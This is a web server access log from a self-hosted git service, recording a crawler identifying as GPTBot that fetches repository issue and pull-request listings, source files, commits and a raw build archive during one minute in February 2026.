git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz" +[17/Feb/2026:18:54:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz" +[17/Feb/2026:18:54:22 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz" +[17/Feb/2026:18:54:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz" +[17/Feb/2026:18:54:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz" [Client 74.7.227.38] [Length 4617598] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz" +[17/Feb/2026:18:54:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz" [Client 74.7.227.38] [Length 9815] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz" +[17/Feb/2026:18:54:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz" [Client 74.7.227.38] [Length 902] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz" +[17/Feb/2026:18:54:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10166] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=leastcomment&state=all&type=all" +[17/Feb/2026:18:54:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 9983] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=mostcomment&state=all&type=all" +[17/Feb/2026:18:54:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10169] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=leastcomment&state=all&type=all" +[17/Feb/2026:18:54:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10174] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=farduedate&state=all&type=all" +[17/Feb/2026:18:54:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10165] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=recentupdate&state=all&type=all" +[17/Feb/2026:18:54:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10192] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&state=all&type=all" +[17/Feb/2026:18:54:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10192] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&state=all&type=all" +[17/Feb/2026:18:54:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10023] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&state=all&type=all" +[17/Feb/2026:18:54:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10190] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&state=all&type=all" +[17/Feb/2026:18:54:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10020] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&state=all&type=all" +[17/Feb/2026:18:54:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10188] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&state=all&type=all" +[17/Feb/2026:18:54:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10019] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&state=all&type=all" +[17/Feb/2026:18:54:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10032] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&state=open&type=all" +[17/Feb/2026:18:54:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10204] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&state=open&type=all" +[17/Feb/2026:18:54:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10204] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&sort=leastcomment&state=open&type=all" +[17/Feb/2026:18:54:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10182] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" +[17/Feb/2026:18:54:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10025] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:54:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10190] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:54:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10193] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:54:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10011] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=farduedate&state=open&type=all" +[17/Feb/2026:18:54:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=rendered" [Client 74.7.227.38] [Length 11089] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:18:54:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=source" [Client 74.7.227.38] [Length 15194] [Gzip 5.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:18:54:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11139] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:18:54:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10157] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?milestone=-1&state=closed&type=all" +[17/Feb/2026:18:54:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10001] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?milestone=-1&state=closed&type=all" +[17/Feb/2026:18:54:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:18:54:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10140] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&project=-1&state=all&type=all" +[17/Feb/2026:18:54:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10031] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=oldest&state=open&type=all" +[17/Feb/2026:18:54:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 9984] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&project=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:18:54:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 9989] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&state=all&type=all" +[17/Feb/2026:18:54:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10146] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&project=-1&state=all&type=all" +[17/Feb/2026:18:54:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10187] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:18:54:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10018] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:18:54:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9958] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?project=-1&state=all&type=all" +[17/Feb/2026:18:54:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old_codec.cpp?display=rendered" [Client 74.7.227.38] [Length 11057] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old_codec.cpp" +[17/Feb/2026:18:54:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old_codec.cpp?display=rendered" [Client 74.7.227.38] [Length 11056] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old_codec.cpp" +[17/Feb/2026:18:54:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?files=PostgresPatrol%2fPatrol%20Window%20Service%20%eb%93%b1%eb%a1%9d%2funinstall_service.bat" [Client 74.7.227.38] [Length 23294] [Gzip 5.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/uninstall_service.bat" +[17/Feb/2026:18:54:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10205] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&state=open&type=all" +[17/Feb/2026:18:54:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10192] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:54:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10189] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:54:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10189] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:54:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10187] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:54:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10021] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:54:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10190] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:54:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10187] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=latest&state=open&type=all" +[17/Feb/2026:18:54:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/branch/main/OpcUaMinimal/TestService/obj/project.assets.json" [Client 74.7.227.38] [Length 60378] [Gzip 23.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/project.assets.json" +[17/Feb/2026:18:54:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10012] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=farduedate&state=open&type=all" +[17/Feb/2026:18:54:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10016] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&state=open&type=all" +[17/Feb/2026:18:54:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old_log_macros.hpp?display=rendered" [Client 74.7.227.38] [Length 11064] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old_log_macros.hpp" +[17/Feb/2026:18:54:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/.Notebook/BRIN%20%EC%84%A4%EB%AA%85.md?display=rendered" [Client 74.7.227.38] [Length 13365] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.Notebook/BRIN%20%EC%84%A4%EB%AA%85.md" +[17/Feb/2026:18:54:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10034] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 